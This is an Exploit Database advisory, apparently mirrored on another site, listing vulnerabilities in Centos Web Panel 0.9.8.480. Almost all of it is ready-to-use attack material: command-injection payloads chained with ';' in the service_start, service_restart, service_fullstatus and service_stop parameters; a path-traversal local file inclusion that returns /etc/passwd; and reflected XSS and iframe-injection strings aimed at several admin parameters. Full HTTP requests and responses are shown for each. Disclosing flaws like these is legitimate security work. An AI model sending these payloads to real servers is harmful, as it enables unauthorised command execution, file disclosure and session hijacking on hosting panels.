Centos Web Panel 0.9.8.480 – Multiple Vulnerabilities

• Exploit Database
• 107 阅读

• 作者： seccops
  日期： 2018-10-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45610/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173

  # Exploit Title: Centos Web Panel 0.9.8.480 Multiple Vulnerabilities # Exploit Author: Seccops - Siber Güvenlik Hizmetleri (https://seccops.com) # Vendor Homepage: http://centos-webpanel.com/ # Software Link: http://centos-webpanel.com/system-requirements # Version: 0.9.8.480 # Tested on: Centos 7 # Vulnerability Types: Command Injection, Local File Inclusion, Cross-site Scripting, Frame Injection # CVE: -   ### Vulnerability Name: Command Injection ### 1) Proof URL: http://localhost:2030/admin/index.php?service_start=opendkim;expr 268409241 - 2;x Parameter Name: service_start Parameter Type: GET Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx HTTP Request: GET /admin/index.php?service_start=opendkim%3bexpr%20268409241%20-%202%3bx HTTP/1.1 Host: localhost:2030 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D Referer: http://localhost:2030/admin/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 Note: Mathematical process: 268409241 - 2. So, the result is expected 268409239. HTTP Response: HTTP/1.1 200 OK Server: cwpsrv X-Powered-By: PHP/7.0.24 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Date: Mon, 01 Oct 2018 21:06:42 GMT Cache-Control: no-store, no-cache, must-revalidate HTML Content: <div class=&apos;alert alert-warning&apos;> <button type=&apos;button&apos; class=&apos;close&apos; data-dismiss=&apos;alert&apos;>×</button> <strong>WARNING!</strong> <pre>268409239 sh: x.service: command not found </pre><br> 2) Proof URL: http://localhost:2030/admin/index.php?service_restart=sshd;expr 268409241 - 2;x Parameter Name: service_restart Parameter Type: GET Attack Pattern: sshd%3bexpr+268409241+-+2%3bx 3) Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=opendkim;expr 268409241 - 2;x Parameter Name: service_fullstatus Parameter Type: GET Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx 4) Proof URL: http://localhost:2030/admin/index.php?service_stop=named;expr 268409241 - 2;x Parameter Name: service_stop Parameter Type: GET Attack Pattern: named%3bexpr+268409241+-+2%3bx ### Vulnerability Name: Local File Inclusion ### 1) Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd Parameter Name: file Parameter Type: GET Attack Pattern: %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP Request: GET /admin/index.php?module=file_editor&file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: localhost:2030 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D Referer: http://localhost:2030/admin/index.php User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 HTTP Response: HTTP/1.1 200 OK Server: cwpsrv X-Powered-By: PHP/7.0.24 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Date: Mon, 01 Oct 2018 20:45:19 GMT Cache-Control: no-store, no-cache, must-revalidate HTML Content: File info <a href=&apos;https://www.exploit-db.com/exploits/45610/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd&stats=yes&apos;>[stats]</a>:<pre>-rw-r--r-- 1 root root 2272 Sep 28 07:48 /../../../../../../../../../../../etc/passwd </pre><h3>Contents of File: /../../../../../../../../../../../etc/passwd</h3> <form action=&apos;&apos; method= &apos;post&apos;> <textarea id=&apos;textarea&apos; name=&apos;newd&apos; cols=&apos;100%&apos; rows=&apos;50&apos;>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync etc...   ### Vulnerability Name: Cross-site Scripting & Frame Injection ### 1) Proof URL: http://localhost:2030/admin/fileManager2.php?frame=3&action=8&cmd_arg=design&fm_current_dir=<scRipt>alert(1)</scRipt> Parameter Name: fm_current_dir Parameter Type: GET Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e 2) Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&file=/etc/sysconfig/selinux Parameter Name: module Parameter Type: GET Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e 3) Proof URL: http://localhost:2030/admin/index.php?service_start=<scRipt>alert(1)</scRipt> Parameter Name: service_start Parameter Type: GET Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e 4) Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=<scRipt>alert(1)</scRipt> Parameter Name: service_fullstatus Parameter Type: GET Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e 5) Proof URL: http://localhost:2030/admin/index.php?service_restart=<scRipt>alert(1)</scRipt> Parameter Name: service_restart Parameter Type: GET Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e 6) Proof URL: http://localhost:2030/admin/index.php?service_stop=<scRipt>alert(1)</scRipt> Parameter Name: service_stop Parameter Type: GET Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e 7) Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=<scRipt>alert(1)</scRipt> Parameter Name: file Parameter Type: GET Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e 8) Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&dir=/var/log Parameter Name: module Parameter Type: GET Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e